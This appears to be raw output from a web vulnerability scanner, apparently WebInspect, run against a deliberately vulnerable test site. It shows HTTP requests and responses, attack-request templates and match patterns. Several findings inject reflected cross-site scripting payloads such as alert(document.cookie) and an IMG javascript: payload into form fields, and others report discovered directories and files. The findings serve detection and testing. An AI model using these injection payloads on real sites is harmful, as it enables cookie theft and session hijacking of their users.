<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>test@<script>alert(document.cookie)</script>.com</attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /testing/plink.asp?a=b&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 349
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/plink.asp</font><font face="Arial" size=2>, line 29</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?a=b&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=test@<script>alert(document.cookie)</script>.com&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>test@<script>alert(document.cookie)</script>.com</attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"'><img%20src="javascript:alert('XSS')">&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = >"'><img src="javascript:alert('XSS')"></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&txtFirstName=Joe&txtLastName=Swinneyjavascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=>"><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>>"><script>alert('XSS')</script></attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /login/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:17 GMT
X-Powered-By: ASP.NET
Location: login.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
Directory (login)<B>Found Directory:</B> /login/ <p>
This directory could be used for customer logins or employee logins.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /debug.dat HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:22 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:21 GMT
ETag: "da1665c2a8dc11:8f6"
Content-Length: 25
BRUTE FORCE CHECK SUCCESSDebug Application (debug.dat)The file debug.dat was located.GET /<attack>debug.dat</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=--><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
